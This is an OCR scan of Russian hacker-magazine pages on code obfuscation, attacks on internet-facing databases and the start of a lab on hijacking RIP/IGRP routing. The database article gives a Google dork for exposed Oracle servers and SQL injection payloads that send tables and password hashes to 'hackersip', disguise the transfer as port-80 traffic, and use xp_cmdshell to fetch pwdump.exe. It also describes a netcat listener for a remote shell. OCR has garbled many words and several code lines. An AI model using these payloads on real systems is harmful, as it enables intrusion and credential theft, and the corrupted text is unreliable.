гих примитивных машин. Производительности со- 
временных процессоров будет достаточно. В 
практическом плане это означает полный мрак 
стандартным методам анализа кода. Если теоре- 


тически возможно (но практически очень и очень 
сложно) вычистить мусор и удалить избыточ- 
ность, внесенную «запутывателями», то «распу- 
тать» байт-код Сетей Петри уже невозможно. 
Этот процесс однонаправленный, и развернуть 
его на 180 градусов не сможет даже сам Джа. 
Вполне возможно написать анализатор байт-ко- 
да, повышающий уровень абстракции, вот только 
даже на таком уровне придется очень долго раз- 
бираться, что, как и куда. 


Анализ типа «черного ящика» сулит намного 
большие перспективы, как и создание вирту- 
альной машины, отрезающей защиту от вне- 
шнего мира. Дизассемблеры уже остановились 
в своем развитии и скоро вымрут, как мамонты 
в ледниковый период. В последних версиях IDA 
Pro не появилось ничего радикально нового. Xy- 
же того, наметились признаки явной деграда- 
ции, превратившие основное окно дизассем- 
блера в «это» (вырезано строгой цензурой). 
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Зачем вообще нужна такая красивая трехмерная 
«репрезентация»? Что она реально отображает? 
С другой стороны, от «низкоуровневого» дизас- 
семблирования на уровне ассемблерных команд 
тоже не много пользы. Современные программы 
стали слишком большими, количество уровней 
абстракций измеряется многими десятками, и 
«плотность» значимого кода неумолимо стремит- 
ся к нулю. Программа размером в 100 Мб реали- 
зует простейший алгоритм, в былые времена с 
легкостью умещавшийся в несколько килобайт. 
Какие там обфускаторы... 

Отсюда многочисленные попытки визуализи- 
ровать поток выполнения программы, которые под- 
нимают нас на уровень анализа структуры кода. 
Спускаясь к машинным командам только там, где 
действительно необходимо. К сожалению, эта мето- 
дика работает намного хуже, чем выглядит, и толь- 
ко усложняет анализ. Стандартный режим дизас- 
семблирования, к которому мы привыкли, все еще 
присутствует в IDA PRO (во всяком случае пока), но 
уже не является режимом по умолчанию № 


обфускация: 
история болезни 


Обфускацией (от английского obfuscation — буквально «запутывание») на- 
зывается совокупность методик и средств, направленных на затруднение 
анализа программного кода. Существуют различные типы обфускаторов: 
одни занимаются интерпретируемыми языками типа Рей или РНР и «коре- 
жат» исходные тексты (удаляют комментарии, дают переменным бессмы- 
сленные имена, шифруют строковые константы и т.д.), другие «перемалыва- 
ют» байт-код виртуальных машин Java и .МЕТ, что технически сделать нам- 
ного труднее. Более развитые обфускаторы вламываются непосредственно 
в машинный код, «разбавляя» его мусорными инструкциями и выполняя це- 
лый ряд структурных (реже математических) преобразований, изменяющих 
программу до неузнаваемости. 

Фактически, это полиморфные генераторы, известные еще со времен 
царя Гороха. Проблема в том, что полиморфный генератор может за счи- 
танные секунды сгенерировать хоть миллиард бессмысленных команд, пе- 
ремешав их с несколькими килобай- 
тами полезного кода, что позволяют 
современные процессоры и жесткие 
диски. Пусть даже с потерей эффек- 
тивности, но всем уже давно напле- 
вать на эффективность. 
> — удалять «мусор» в автоматиче- 
ском режиме дизассемблеры еще 
не научились, а проанализировать 
мегабайты кода вручную нереально. 
Нужны передовые методики рекон- 
струкции потока управления, рас- 
плавляющие «замусоренный» код и 
разделяющие его на «полезные» и 
«бесполезные» фракции. ИХ нет да- 
же на уровне «теоретического пони- 


ль п у ES, 
= вы 
Попытка взлома программы, защи- 


щенной Агтаа!Рой, приводит к жут- 
ким ругательствам защиты 


мания». Хотя кое-какие идеи на этот счет имеются (например наложение 
маршрута трассировки на графы зависимостей по данным), до практической 
реализации еще далеко. 
> методы обфускации активно используются продвинутыми упаковщика- 
ми типа Armadillo (ныне переименован в Software Passport, можно скачать его с 
сайта httpi/siliconrealms.com/armadillo.shtml), eXtreme Protector (разработчики живут 
на www.oreans.com/xprotector) И Т.Д. Большинство протекторов «запутывают» толь- 
ко свой собственный распаковщик, опасаясь вмешиваться в код защищаемой 
программы, так как это чревато неожиданным появлением глюков в самых раз- 
личных местах. Какому программисту понравится такая защита? Тем не менее, 
обфускация процедур проверки серийного номера (ключевого файла) встреча- 
ется достаточно часто. Обычно она реализуется в полуавтоматическом режи- 
ме, когда создатель защиты тем или иным образом взаимодействует с обфу- 
скатором. Например, пишет скрипт, который обфускатор транслирует в заму- 
соренный машинный код, изображая из себя «неэффективный» компилятор. 
Обфускация конкретно досаждает хакерам, препятствуя реконструк- 
ции алгоритмов и быстрому взлому защит, но эти проблемы меркнут перед 
ситуацией в антивирусной индустрии. Чтобы взломать программу, анализи- 
ровать ее алгоритм в общем-то необязательно. Зато обнаружить зловред- 
ный код (он же malware) без этого уже не удастся! 


Официальный сайт протектора-обфу- 
скатора eXtreme Protector 


Мо от хакерской группы TMG, взломавшей обфускатор Armadill 
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базовый 
иммунитет 


ПОЧЕМУ ЛОМАЮТ БД 


ОТВЕТ НА ЭТОТ ВОПРОС ЛЕЖИТ НА ПОВЕРХНОСТИ: «ПОТОМУ ЧТО ИМЕННО ТАМ 
ХРАНИТСЯ ЦЕННАЯ ИНФОРМАЦИЯ И ИМЕННО ТАМ ОНА СИСТЕМАТИЗИРОВАНА 
СООТВЕТСТВУЮЩИМ ОБРАЗОМ» ЕКАТЕРИНА ДЕРБЕНЦЕВА 


атаки 

на базы 
через 
интернет 


База данных в Сети — лакомый кусочек не только 
для тех, кто знает, куда и зачем он лезет, но и для 
тех, кто приобрел хакерские навыки, захотел попрак- 
тиковаться в них и опробовать новые эксплойты. 

> в первую очередь посмотрим на распреде- 
ленные «ОБо$-атаки». Они не позволят добраться 
до информации и получить доступ к ней, зато сде- 
лают критичный ресурс недоступным для осталь- 
ных пользователей. Распределенные «DDoS-ata- 
ки» обычно организуются при помощи бот-сетей (из 
компьютеров-зомби). По оценкам специалистов, 
сейчас практически каждый второй компьютер, 
имеющий выход в интернет, участвует в какой-либо 
бот-сети, которая в любой момент может быть ис- 
пользована для организации подобной атаки. 

> распределенная атака обычно организуется 
по следующей схеме. Компьютеры пользовате- 
лей, зараженные определенной троянской про- 
граммой, объединяются в сеть. Образованные се- 
ти могут находиться в «спящем режиме» доста- 
точно долгое время, ожидая своего часа. Числен- 
ность компьютеров в бот-сети иногда получает 
размах от нескольких десятков до десятков тысяч 
машин. В определенный момент (по команде вла- 
дельца) эти узлы начинают посылать запросы к 
серверу БД. Идет множество бессмысленных об- 
ращений — и вот сервис уже отказывается отве- 
чать на любые запросы. В худшем случае он сов- 
сем выходит из строя и становится неспособным 
самостоятельно вернуться к рабочему состоянию. 
Если подобная атака организуется на сервер с ба- 
зой электронных платежей крупного интернет-ма- 
газина, то размеры ущерба, может быть, внушат 
уважение и, несомненно, порадуют конкурентов. 


как защититься 


КАК НИ БАНАЛЬНО ЗВУЧИТ, РАЗГРАНИ- 
ЧИВАТЬ ДОСТУП К РЕСУРСАМ, МЕНЯТЬ 
ПАРОЛИ, ВОВРЕМЯ ПРОПАТЧИВАТЬ 
УЯЗВИМОСТИ И Т.Д. КРОМЕ ТОГО, 
СУБД НЕ ДОЛЖНА ВЫДАВАТЬ 
КОНФИГУРАЦИОННУЮ ИНФОРМАЦИЮ 
О СЕБЕ: НИ ПО ЗАПРОСУ, 

НИ ПО СООБЩЕНИЮ ОБ ОШИБКЕ. 


Бот-сеть является обычным, но не обязательным 
компонентом такой атаки. Подобные действия мо- 
гут совершаться и по предварительному сговору 
машин, не связанных в такую сеть. 

> Kak противостоять DDoS-atake. Наверное, на 
сегодня нет простого и универсального способа 
решить эту задачу. Как вариант — распараллели- 
вать запросы к базе либо писать политики, соглас- 
но которым запрещается использование процес- 
сорного времени свыше определенного временно- 
го промежутка. Однако это не всегда приемлемо, 
а кроме того, приводит к банальному увеличению 
задействованной вычислительной мощности — 
ресурсы направляются не на повышение эффек- 
тивности системы, а на возможную обработку 
фиктивных запросов. 

>  интернет-разведка. Всемирная паутина пре- 
доставляет широкие возможности для «практи- 
кующихся» взломщиков и лиц, собирающих 


предварительную информацию об интересных им 
ресурсах, годную для применения в будущих ата- 
ках на БД. Они могут использовать соответствую- 
щие запросы на поисковых машинах, и по их ре- 
зультатам система выдает списки интернет-сер- 
веров с базами данных. Первая атака, в ходе ко- 
торой была применена поисковая машина, заре- 
гистрирована в 2004 году, и с тех пор этот метод 
является обычной практикой для получения до- 
полнительной конфигурационной информации о 
серверах-жертвах. 


пример одного из таких запросов — 
с использованием поисковой машины Google 
intitle:index.of listener.ora 


Получаешь список с информацией о том, какие 
базы данных Oracle доступны из Сети (другими 
словами, те, в которых проиндексированы серви- 


сы listener). Идешь по ссылке и получаешь инфор- 
мацию о базе данных. 


Из этих данных выловлены сведения о версии ба- 
зы. Позже это пригодится: зная номер версии, 
можно попытаться эксплуатировать одну из из- 
вестных уязвимостей именно этой версии. Кроме 
того, в сообщении выведен IP-agpec, SID и номера 
портов, что также пригодится в процессе атаки. 
> — другой пример разведки связан с инструмен- 
том iSQLPlus — стандартной утилитой Oracle, кото- 
рая используется для «общения» с базой. Начиная 
с девятой версии Oracle она представляет собой 
\муеБ-приложение — конечно, в плане использова- 
ния удобно, теперь ты не обязан ставить соответ- 
ствующий агент на клиентскую станцию и драйвер 
SQL*NET (как было в ранних версиях утилиты). 
Зная о подобной утилите, злоумышленник 
может запустить поиск, чтобы обнаружить web- 


115 


формы iSQLPlus, использовав для этого, к приме- 
ру, возможности расширенного поиска в Google. 

Подобный поиск можно организовать и че- 
рез Yahoo. В этом случае просто запускается по- 
иск текста, который, как известно, существует на 
м/еб-странице iSQLPlus — “iSQL*Plus Release”. 

Существует множество комбинаций тексто- 
вых строк для поиска, как и поисковых машин в 
интернете. Из Сети доступна огромная масса сер- 
веров БД, и часть из них обязательно имеет незак- 
рытые уязвимости, в том числе неизмененные па- 
роли и учетные записи по умолчанию. Даже если 
такой сервер сам по себе не является критичным, 
может быть, он связан с другим ресурсом, инте- 
ресным злоумышленнику, или из него устроят пло- 
щадку для новой атаки. 


использование 
ошибок 
синтаксиса 


Ошибки синтаксиса часто оставляют без особого 
внимания. Незавершенный запрос, хранение па- 
ролей в коде, иногда даже в открытом виде (!) — 
те уязвимости, которыми злоумышленник вос- 
пользуется в первую очередь, если возьмется за 
добывание доступа к данным. 

Вот, к примеру, посмотрим, как выглядит 
обычный запрос к базе данных. Он начинается с be- 
gin и заканчивается Commit. Если в базе разрешен 
пользовательский ввод и он не проверяется или 
проверяется недостаточно качественно, в результа- 
те посыла запроса, в начале которого стоит обыч- 
Hoe begin, но в конце нет Commit, база перестает от- 
вечать на другие запросы, обращенные к ней. 


использование 
уязвимостей 
приложений 


Если сами БД, как правило, защищены довольно 
неплохо и их обслуживают грамотные администра- 
торы, то дело с приложениями часто обстоит до- 
вольно грустно. Например, посмотрим, что проис- 
ходит, если доступ к базе разграничен средствами 
приложения (встречается достаточно часто) и при- 
ложение обращается к базе со стандартным паро- 
лем. Хэш пароля перехватывается отладчиком, в 
результате удается попытка подключиться к базе с 
неограниченными правами. Впрочем, случается и 
такое, что пароль лежит в реестре, в конфигура- 


ционных файлах — обнаружить его будет еще про- 
ще. Другими словами, хакеру не приходится даже 
ломать саму БД, достаточно внимательно пригля- 
деться к окружению. 


как защититься 


НА ЭТАПЕ РАЗРАБОТКИ ПРОГРАММНО- 
ГО РЕШЕНИЯ НЕОБХОДИМО ЗАДУМАТЬ- 
СЯ О БЕЗОПАСНОСТИ ДАННЫХ, ХРАНИ- 
МЫХ В СУБД. ЕСЛИ ИЗМЕНИТЬ КОД 
ПРИЛОЖЕНИЯ ВСЕ-ТАКИ НЕВОЗМОЖ- 
НО, СТАРАЙСЯ ПОЧАЩЕ ИЗМЕНЯТЬ ПА- 
РОЛЬ ТОЙ УЧЕТНОЙ ЗАПИСИ, ОТ ИМЕ- 
НИ КОТОРОЙ ФУНКЦИОНИРУЕТ ПРИЛО- 
ЖЕНИЕ. ИНИЦИИРУЙ РЕГИСТРАЦИЮ СО- 
БЫТИЙ ПОПЫТКИ ДОСТУПА В БД ОТ 
ИМЕНИ ЭТОЙ УЧЕТНОЙ ЗАПИСИ. 
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корпоративная 
база данных 


> защита от внешних злоумышленников. Не 
будем спускаться до «школьных» правил: СУБД в 
выделенном сегменте и за межсетевым экраном. 
Злоумышленники не сидят сложа руки — методы 
их работы тоже не стоят на месте, поэтому 
«школьные» меры не всегда обеспечивают надеж- 
ную защиту. Чтобы повысить защищенность, нуж- 
но регулярно оценивать ее, а в идеале — монито- 
рить доступ к СУБД. Как дополнительные меры — 
«сетевые ловушки», то есть эмулированные 
СУБД, с сознательно созданными уязвимостями, 
действующие как приманки для хакера. Такие ло- 
вушки позволяют выиграть время и проанализиро- 
вать методы из запасов атакующего. 
> пример расчета. Объем БД — 10 Гб (средний 
размер БД в корпоративной сети). Скорость канала 
«из сети» — 1,5 Мб. Скорость передачи информа- 
ции по каналу — примерно 400 Кб/с. Примерное 
снижение пропускной способности канала из-за его 
загрузки плюс возможные работы и простои — 50%. 
Таким образом, конечная скорость, с которой 
данные будут качаться по сети, составляет пример- 
но 200 Кб/с. Время, необходимое для выкачивания 
данных из базы, — около 15-ти часов. Трудно пред- 
положить, что за это время администратор не об- 
ратит внимания на постоянную высокую загружен- 
ность канала и не примет соответствующие меры. 
> — уязвимости, которыми могут воспользовать- 
ся легальные пользователи в Сети: 


™ ОШИБКИ РАЗГРАНИЧЕНИЯ ДОСТУПА; 
™ ОШИБКИ СИНТАКСИСА; 
—` ПАРОЛИ ПО УМОЛЧАНИЮ. 
> пример. Злоумышленник (обиженный или 


просто любопытный пользователь) просканировал 
Сеть любым из доступных сетевых сканеров. Он 


обнаруживает сервер БД, пытается загрузить на 
него такую утилиту, как NetCat, при помощи техни- 
ки 5ОЕ-инъекции (загрузка бинарного файла). Да- 
лее NetCat используется для прослушивания входя- 
щих соединений на порту службы telnet. Если под- 
ключение прошло успешно, запускается cmd.exe. 
После того как подключение no telnet будет 
реализовано, пользователь получит доступ к ко- 
мандной строке атакуемой машины и администра- 
торские привилегии. 
> Kak защититься. Опять же, провести аудит 
подключений к СУБД — подобная активность бу- 
дет вовремя обнаружена. 
> = неверно разграниченные права доступа поль- 
зователей к таблицам базы породят самые разные 
злоупотребления — и случайные, и преднамерен- 
ные. К примеру, таблица с ролями пользователей и 
идентификаторами этих ролей оказывается доступ- 
на любому из пользователей базы. В худшем слу- 


чае станет доступным еще и внесение изменений в 
нее. Таким образом, пользователь может заменить 
идентификатор для своего имени на соответствую- 
щий администраторскому и подключиться к базе 
данных уже с расширенными полномочиями. 

> — имя/пароль по умолчанию. Сейчас в критич- 
ных БД пары имя/пароль, оставленные по умолча- 
нию, — почти атавизм. Но в не критичных ресурсах 
(а иногда просто в оставленных без внимания) эти 
пары могут сослужить свою службу злоумышленни- 
ку: проникаешь во внутреннюю сеть, затем выбира- 
ешь как цель более привлекательный ресурс в Сети. 
> — по умолчанию любая СУБД, как правило, 3a- 
пускается как локальная система, обладающая си- 
стемными правами. Запуск СУБД с правами локаль- 
ной системы может также сработать как уязвимость. 
Если злоумышленник подключится к базе напрямую, 
через Enterprise Manager, SQLPlus или аналогич- 
ные средства, он получит в СУБД системные права. 


за|-инъекции 


ЗОЕ-инъекции часто используются для того, что- 
бы выудить лакомые для кого-то данные из базы 
в обход межсетевого экрана либо для проникно- 
вения во внутреннюю сеть. 

> — защита от ЗОЁ-инъекций сейчас встраивает- 
ся в меб-приложения в обязательном порядке. Од- 
нако благодаря тому, что вариантов этой атаки ве- 
ликое множество, а приложения могут быть доста- 
точно сложными, одна пропущенная инъекция име- 
ет шансы скомпрометировать всю сеть. Действи- 
тельно, обеспечить надежную защиту от этого вида 


атак — нерешенная проблема. Некоторые админи- 
страторы БД считают, что никакая ЗОЁ-инъекция 
не угрожает им, потому что они используют храни- 
мые процедуры и маскируют сообщение об ошиб- 
ке, которое выдает браузер. Да, действительно по- 
могает, но, к сожалению, далеко не всегда. 

> — ЭОЁ-инъекции на примере MS SQL. Пытаясь 
применить ЗОЁ-инъекцию против нужного сервера 
БД, атакующий должен проверить, подвержен ли 
сервер БД выбранному виду атаки. Для этого можно 
использовать одну из встроенных функций SQL-cep- 
вера: OPENROWSET или OPENDATASOURCE (при- 
меняется для подключения к ОГЕОВ-провайдеру; 
в примерах используется функция OPENROWSET, 
но подойдет и OPENDATASOURCE). 


ce 


номер порта 


Ва he 
Е 


Snetcatonc -1 -р 53 


ww —р 53 


слушаем 


1 16. , | 


1Радрес атакующего 


192.168 


4.2 


IP адрес атакуемого хоста 


при помощи такого запроса можно скопировать 
все поля из таблицы 

select * from 

OPENROWSET( 'SQLoledb', 
'server=servername;uid=sa;pwd=h8ck3r', 
"select * from tablel' ) 


уточненный запрос, сразу указывающий IP-agpec 
и порт, к которому нужно подключиться 

select * from 

OPENROWSET ('SQLoledb', 
‘uid=sa;pwd=h8ck3r;Network=DBMSSOCN; 
Address=10.0.0.10,1433;", 

‘select * from table' ) 


В примере SQL Server использует OLEDB-nposai- 
дера SQLoledb, чтобы выполнить запрос. OLEDB- 
провайдер пользуется библиотекой SQL Server 
sockets (DBMSSOCN) для подключения к порту 
1433 Ha IP-agpec 10.0.0.10 и возвращает результат 
запроса на SQL-cepsBep. 

OPENROWSET используют не только для 
выполнения запросов типа SELECT, но и для до- 
бавления-удаления информации из таблиц при по- 
мощи запросов UPDATE, INSERT и DELETE. Ма- 
нипулирование данными на удаленных источниках 
данных применимо только в том случае, если 
ОТЕОВ-провайдер поддерживает данный функ- 
ционал. Провайдер SQLOLEDB поддерживает все 
эти функции. 


пример добавления данных 

insert into 

OPENROWSET ('SQLoledb', 
'server=servername;uid=sa;pwd=h8ck3r', 
"select * from tablel') 

select * from table2 


Все строки из таблицы 2 Ha локальном SQL-cepBe- 
ре добавляются в таблицу 1 на удаленном источни- 
ке данных. Для того чтобы запрос выполнился кор- 
ректно, обе таблицы должны иметь одинаковую 
структуру: одинаковое количество столбцов и 
строк, а также имена столбцов. 


пример иллюстрирует получение списка логинов и 
хэшированных паролей 

insert into 

OPENROWSET('SQLoledb', 
‘uid=sa;pwd=h8ck3r;Network=DBMSSOCN; 
Address=hackersip,1433;', 

‘select * from _sysxlogins') 

select * from database.dbo.sysxlogins 


Если межсетевой экран сконфигурирован так, 
чтобы блокировать все исходящие подключения к 
SQL-cepBepy, злоумышленник победит и это огра- 
ничение — подберет соответствующую технику. 
Для передачи данных он может использовать 80 
порт, благодаря которому замаскирует передачу 
данных под И#р-трафик. 
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маскировка передачи данных под И#р-трафик 
insert into 

OPENROWSET('SQLoledb', 
'uid=sa;pwd=h8ck3r;Network=DBMSSOCN; 
Address=hackersip,80;', 

‘select * from tablel' 

select * from tablel 


Если внешние подключения по 80 порту опять же 
блокируются межсетевым экраном, злодей возь- 
мется перебирать порты, пока не найдется такой, 
подключение к которому не будет блокировано. 


с помощью ЗОЕ-инъекций можно загружать файлы 
bulk insert AttackerTable 

from 'pwdump.exe' 

with (codepage='!RAW' ) 

The binary can then be downloaded to 
the victim server from the attacker’s 
server by running the 

following SQL statement on the victim 
server: 

exec xp_cmdshell ‘bcp «select * from 
AttackerTable» queryout pwdump.exe -c - 
Craw -Shackersip -Usa -Ph8ck3r' 


запрос для обхода межсетевой защиты 

exec xp_regwrite 

'HKEY_LOCAL_MACHINE' , 'SOFTWARE\Micro- 
soft\MSSQLServer\Client\ConnectTo', 'Hacke 
шоки ас", JREGUSZ , ‘DEMSSOEN 
hackersip,80' 

and then: 

exec xp_cmdshell ‘bcp «select * from 
AttackerTable» queryout pwdump.exe -c - 
Craw -SHackerSrvAlias -Usa -Ph8ck3r' 


Существуют также техники, позволяющие прони- 
кать во внутреннюю сеть либо проникать с одного 
сервера БД на другой, вглубь сети, в поисках дан- 
ных, интересных хакеру. 

> приведенные примеры касались ЗОЁ-инъек- 
ций для БД Microsoft SQL. Не думай, что эти сер- 
веры баз данных подвержены такому типу атаки 
особенно. Похожие средства для реализации SQL- 
инъекций есть и в Oracle, и в любой другой базе 
данных. Тип базы не имеет никакого значения — 
в них используется единый язык запросов № 


как защититься 


—` ИСПОЛЬЗОВАТЬ СТАНДАРТНЫЕ ПАРА- 
МЕТРЫ ДЛЯ ЛЮБОГО ВИДА ЗАПРОСА; 


— ФИЛЬТРОВАТЬ ПОЛЬЗОВАТЕЛЬСКИЙ 
ВВОД НА НАЛИЧИЕ СПЕЦИАЛЬНЫХ 
СИМВОЛОВ; 


— ИСПОЛЬЗОВАТЬ ХРАНИМЫЕ 
ПРОЦЕДУРЫ; 


—` ИСПОЛЬЗОВАТЬ ДОПОЛНИТЕЛЬНЫЕ 
ПРОГРАММНЫЕ СРЕДСТВА, ПОЗВОЛЯЮ- 
ЩИЕ ОБНАРУЖИВАТЬ ЭТОТ ВИД АТАКИ; 


“~~ ПО ВОЗМОЖНОСТИ НЕ РАЗРЕШАТЬ 
МНОЖЕСТВЕННЫЕ ЗАПРОСЫ. 
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лабораторная 


работа 


АТАКА HA НР И САР 


ОДНИМ ИЗ КЛЮЧЕВЫХ МОМЕНТОВ ВЗЛО- 
МА СЕТЕЙ, ОСОБЕННО ЛОКАЛЬНЫХ, ЯВ- 
ЛЯЕТСЯ ПЕРЕХВАТ ТРАФИКА, ИСПОЛЬЗУ- 
ЮЩИЙ УЯЗВИМОСТИ В ДИНАМИЧЕСКИХ 
ПРОТОКОЛАХ МАРШРУТИЗАЦИИ. ПОПЫ- 
ТАЕМСЯ РАЗОБРАТЬСЯ, КАК ЭТО ПРОИС- 
ХОДИТ В СЕТЯХ, ТАКИХ КАК НР И IGRP, 
В КОТОРЫХ ИСПОЛЬЗУЕТСЯ АЛГОРИТМ 
МАРШРУТИЗАЦИИ ПО ВЕКТОРУ РАССТО- 


ЯНИЯ |КОНСТАНТИН ГАВРИЛЕНКО (КОЗ@АВНОМТ.СОМ) 


исходные данные 


Прежде чем переходить к теме взлома, рассмот- 
рим несколько ситуаций, в которых атакующий 
может применить данные методы. 


цели 


> — ситуация 1 — естественно, взлом одного из 
пограничных маршрутизаторов сети через интер- 
нет. Инструментарий для продвижения взлома, ко- 
торый находится в руках у нападающего, доста- 
точно ограничен, в первую очередь его ограничи- 
вают возможности самой системы, будь то марш- 
рутизатор на Linux/BSD или Cisco. Первый вари- 
ант — самый выгодный для атакующего, так как 
позволяет задействовать во взломе множество 
утилит и сделать скомпрометированную машину 
бастионом для атаки. Во втором случае хакер ог- 
раничен набором команд IOS и должен искать аль- 
тернативные пути, в основном через открытие ка- 
налов доступа во внутреннюю сеть с машины ата- 
кующего или внешнее туннелирование трафика 
через СВЕ-туннели. 

> — ситуация 2 — используется локальное подк- 
лючение в коммутатор. К примеру, «обиженный» 
сотрудник компании, мучимый личными интереса- 
ми, вынашивает в себе мысль о взломе локальной 
сети, имеет для этого достаточно опыта и в конце 
концов решается. Около 70% всех взломов совер- 


шаются изнутри компаний, то есть ситуация с оби- 
женным тружеником — совсем не исключение из 
правила. Если еще вспомнить о развитии беспро- 
водной связи, то возможен и такой взлом: атакую- 
щий взламывает локалку или подсоединяется к 
ней через беспроводной шлюз, неправильно скон- 
фигурированный кем-то, или устанавливает 
собственную точку доступа, подключенную к ло- 
кальной сети. 


метод исследования 


Наступил момент, когда в рутовом подчинении 
оказалась машина с OC Linux, подсоединенная к 
ЛВС. И что делать? Не стоит мчаться напролом, не 
нужно опускаться до банального параллельного 
подбора администраторского логина на централь- 
ном сервере. Количество записей на лог-сервере 
кого-нибудь смутит, и, скорее всего, тебя быстро 
ВЫЧИСЛЯТ И «закроют». Если не заточат в места не 
столь отдаленные, то, как минимум, прогонят 
со взломанной машины. 

Как правило, системные администраторы 
бдят защищенность локальной сети гораздо мень- 
ше, чем защищенность машин, непосредственно 
контактирующих с интернетом. Такие админы 
немного облегчают твою задачу: более-менее лег- 
ко (в зависимости от топологии сети, типа исполь- 
зуемого оборудования и количества хостов) ты 
сможешь обнаружить информацию, которая оби- 


тает в сети и пригодится в добывании доступа к 
другим машинам, к пользовательским аккаунтам 
и кинтересным тебе данным. 


теория 


> — НР — самый старый протокол маршрутиза- 
ции. До сих пор используется часто, в основном 
благодаря тому, что понимать и конфигуриро- 
вать его легко. На данный момент самая распро- 
страненная версия протокола — вторая. Среди 
всех ее нововведений и прелестей — поддержка 
аутентификации других маршрутизаторов, участ- 
вующих в домене маршрутизации, масок подсети 
произвольной длины. Также радует, что во вто- 
рой версии учитывается заданная полоса про- 
пускания для установления метрики пути. Среди 
недостатков отмечу высокое время конверген- 
ции, проблему масштабирования и ограничение 
длины маршрута 15-ю узлами. Для обмена дан- 
ными используется многоадресная рассылка по 
адресу 224.0.0.9. 

>  IGRP — протокол маршрутизации, разрабо- 
танный и запатентованный Cisco. До появления его 
модифицированной версии (EIGRP) считался луч- 
шим протоколом, в котором используется алгоритм 
по вектору расстояния. Из недостатков отмечу не- 
возможность аутентификации, отсутствие подде- 
ржки масок произвольной длинны и пересылку 
всей таблицы маршрутизации. Из преимуществ — 
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быстрое время конвергенции, составную метрику 
маршрута, которая использует факторы загружен- 
ности канала, латентность, и проч. Рассылка проис- 
ходит путем отсылки пакетов обновлений на широ- 
ковещательный адрес 255.255.255.255. IGRP-npo- 
токолу присвоен порядковый номер 9. 

> классификация типов атак на протоколы 
маршрутизации. Атаки на протоколы маршрутиза- 
ции можно разделить на три вида: 


1 ИСПОЛЬЗУЕТСЯ ВЗЛОМАННЫЙ 
МАРШРУТИЗАТОР (САМЫЙ БЫСТРЫЙ 

И ЛЕГКИЙ ПУТЬ ИЗМЕНЕНИЯ МАРШРУ- 
ТОВ). АТАКУЮЩИЙ ПОЛУЧАЕТ ПОЛНЫЙ 
ИЛИ ЧАСТИЧНЫЙ ДОСТУП К МАРШРУ- 
ТИЗАТОРУ. 


2 ИСПОЛЬЗУЕТСЯ ПИРАТСКИЙ МАРШРУ- 
ТИЗАТОР. ТИПИЧНЫЙ ПРИМЕР: УСТА- 
НАВЛИВАЮТ ОДИН ИЗ ПАКЕТОВ МАРШ- 
РУТИЗАЦИИ, ПОДКЛЮЧАЮТСЯ К ДОМЕ- 
НУ МАРШРУТИЗАЦИИ И ОПОВЕЩАЮТ 
СОСЕДЕЙ О НОВЫХ МАРШРУТАХ. 


з ИСПОЛЬЗУЕТСЯ ЗАМАСКИРОВАННЫЙ 
МАРШРУТИЗАТОР, ЧТО, КАК ПРАВИЛО, 
НУЖНО ЧТОБЫ ПОДМЕНИТЬ АДРЕС ПО- 
СЫЛАЮЩЕГО НА ЛЕГИТИМНЫЙ, ТО ЕСТЬ 
ЧТОБЫ ОБОЙТИ ЛИСТЫ КОНТРОЛЯ, УС- 
ТАНОВЛЕННЫЕ СИСТЕМНЫМ АДМИНИ- 
СТРАТОРОМ НА КОНКРЕТНОМ МАРШРУ- 
TUSATOPE. 


Какой бы вид атаки ни был выбран, цель злоу- 
мышленника всегда одна и та же — изменить таб- 
лицы маршрутизации по своему усмотрению, ради 
чего идет по одному из четырех путей (по какому 
именно, подскажет ситуация): 


— ИЗМЕНИТЬ МЕТРИКУ МАРШРУТА НА 
МЕНЬШЕЕ ЗНАЧЕНИЕ. ПРИ ВЫБОРЕ 
МАРШРУТА ПРЕДПОЧТЕНИЕ ОТДАЕТСЯ 
МАРШРУТУ С МЕНЬШЕЙ МЕТРИКОЙ. 


—` ИЗМЕНИТЬ ОПОВЕЩАЕМУЮ МАСКУ 
МАРШРУТА НА БОЛЕЕ СПЕЦИФИЧНУЮ. 
НАПРИМЕР, МАСКА 255.255.255.255 БУ- 
ДЕТ ПРЕДПОЧТЕНА МАСКЕ 
255.255.255.128, КОТОРАЯ, В СВОЮ ОЧЕ- 
РЕДЬ, БУДЕТ ПРЕДПОЧТЕНА МАСКЕ 
255.255.255.0. 


“ ИЗМЕНИТЬ ПОЛИТИКУ МАРШРУТИЗА- 
ЦИИ, ПЕРЕРАСПРЕДЕЛИТЬ МАРШРУТЫ 
ИЛИ АДМИНИСТРАТИВНУЮ ДИСТАНЦИЮ 
(НА ПРАКТИКЕ ТАКОЕ ТВОРЯТ РЕДКО, 
ТАК КАК ТРЕБУЕТСЯ ВОЗМОЖНОСТЬ 
ИЗМЕНЯТЬ КОНФИГУРАЦИЮ МАРШРУТИ- 
ЗАТОРА, ЧТО СЛОЖНО). 


“~ ATAKOBATb ОТКАЗ В ОБСЛУЖИВАНИИ, 
ЧТОБЫ УДАЛИТЬ ОПОВЕЩЕНИЕ О 
МАРШРУТЕ, ЗАТЕМ ОПОВЕСТИТЬ ДОМЕН 
О ПРОХОЖДЕНИИ МАРШРУТА ЧЕРЕЗ 
СОБСТВЕННЫЙ МАРШРУТИЗАТОР. 


инструменты 


Обычно под рукой администратора сети и атакую- 
щего лежит tcpdump — их лучший инструмент. Воз- 
можно, более продвинутые люди позовут на по- 
мощь себе tethereal — часть пакета ethereal, кото- 
рая умеет отображать более детальную информа- 
цию из пакета. Однако наши нужды достаточно 
скромны, поэтому вполне обойдемся и 1сраитр’ом. 

Для посылки произвольных запросов можно 
использовать специальную утилиту rprobe (млилм.раскей- 
stormsecurity.org/groups/horizon/rprobe.c) или генератор 
произвольных пакетов типа Sendip (www.earth.li/pro- 
jectpurple/progs/sendip.html) . 

Выбирай инструмент по желанию, конкрет- 
ной ситуации и в зависимости от времени, которое 
потратишь на компиляцию, или компилируемости 
утилиты на конкретной системе. Мы будем исполь- 
зовать sendip. Неопытный хакер, не знакомый с 
«внутренностями» TCP/IP, поначалу будет оше- 
ломлен возможным количеством ее опций. Ниче- 
го. Почитай детали в документации — и все вста- 
нет на свои места, к тому же большинство значе- 
ний можно оставлять по умолчанию. 

Одно из самых популярных средств для 
взлома пароля аутентификации МО5 в НР-паке- 
тах — это Cain&Abel (C&A). Однако для взлома ну- 
жен не только хэш, но и остальные данные, нахо- 
дящиеся в пакете, что, соответственно, создает 
главную проблему атакующего. Однако вновь не 
отчаиваемся, так как решение элементарно: запи- 
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сываешь нужный пакет в рсар-формат, перено- 
сишь его в локальную сеть и затем проигрываешь 
утилитой tcpreplay (http:/tcpreplay.sourceforge.net) 


сохранение НР-пакета 


